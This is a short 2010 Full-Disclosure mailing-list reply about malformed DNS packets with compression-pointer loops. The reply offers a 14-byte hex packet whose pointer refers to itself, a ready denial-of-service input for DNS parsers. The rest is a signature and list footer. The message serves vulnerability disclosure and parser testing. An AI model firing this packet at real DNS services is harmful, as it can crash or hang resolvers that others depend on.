
Date: Fri, 03 Dec 2010 16:52:34 +0000
From: Florian Weimer <fweimer@....de>
To: Srinivas Naik <naik.srinu@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: DNS Pointer - DoS Exploit

* Srinivas Naik:

> A DNS packet with a pointer loop is a protocol anomaly which some programs
> may not handle gracefully.

Try this:

00 00 00 00 00 01 00 00 00 00 00 00 C0 0C

-- 
Florian Weimer                <fweimer@....de>
BFK edv-consulting GmbH       http://www.bfk.de/
Kriegsstraße 100              tel: +49-721-96201-1
D-76133 Karlsruhe             fax: +49-721-96201-99

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
